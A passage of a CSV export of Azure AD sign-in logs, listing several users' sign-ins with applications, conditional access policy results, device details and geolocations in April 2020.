'5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:59,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.471'}",58101571-c323-4e3c-9694-0b1272630e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,58101571-c323-4e3c-9694-0b1272630e00,SigninLogs,Sucess,35.01296997,-80.93171692
+39,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:39.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,02693ad3-6a51-403c-8b07-1bff079ace0e,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:20,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",89223cb6-60af-4a3e-b2e1-947086ac1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,89223cb6-60af-4a3e-b2e1-947086ac1100,SigninLogs,Sucess,33.7984581,-84.38828278
+40,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:01.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,55edbcbe-b2c9-46cb-a19b-8186bdd74ec4,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:28,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",1fc6d415-116e-44c9-a4fc-b8ef896b1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,1fc6d415-116e-44c9-a4fc-b8ef896b1300,SigninLogs,Sucess,38.73078156,-78.17196655
+41,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:35.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b6a9a448-0a05-4860-8235-0da9d3952080,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:50,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",5710832e-d5f6-411b-b39c-044947091500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,5710832e-d5f6-411b-b39c-044947091500,SigninLogs,Sucess,41.90428925,-85.99833679
+42,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:26.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0ed7fdbe-beb6-4dd2-ad9c-e6bdbd4e876a,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",82df5368-1a8b-4fb8-b076-b0dff6521b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,82df5368-1a8b-4fb8-b076-b0dff6521b00,SigninLogs,Sucess,36.6404686,-78.26995087
+43,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:01.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4e3a8255-e0ba-441c-b784-d44955cd86f6,Microsoft.aadiam,Microsoft.aadiam,,Sri Laxmi Sangabathula,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 21:55,"{'operatingSystem': 'Windows 10', 'deviceId': '1aec47a5-7dee-4fd4-be7f-5e85deea66b1', 'browser': 'Edge 83.0.474', 'displayName': 'SRISANG', 'isCompliant': True, 'trustType': 'Hybrid Azure AD joined', 'isManaged': True}",fc72e6d9-f955-4699-a5ac-65596be63100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.04237365722656, 'latitude': 47.62879180908203}, 'state': 'Washington', 'city': 'Sammamish'}",none,none,none,none,[],{'errorCode': 0},Sri Laxmi Sangabathula,ebd55c3c-6338-424d-ad09-46d2147f7598,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,fc72e6d9-f955-4699-a5ac-65596be63100,SigninLogs,Sucess,47.62879181,-122.0423737
+44,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:41.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,93a50b64-6d7f-4ca1-a21a-f11af3ca7e7f,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Block Access JulianI', 'result': 'success', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'JulianI Exchange native controls', 'result': 'success', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 16:57,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",93d60bd4-ad49-40a5-9c6c-157d14011b00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,93d60bd4-ad49-40a5-9c6c-157d14011b00,SigninLogs,Sucess,50.6406517,5.572050095
+45,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:59.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,61b059cd-3bf3-41d9-839e-bd11ea500d87,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",b6b1e129-7976-4148-98ee-f605c5871c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,b6b1e129-7976-4148-98ee-f605c5871c00,SigninLogs,Sucess,33.7984581,-84.38828278
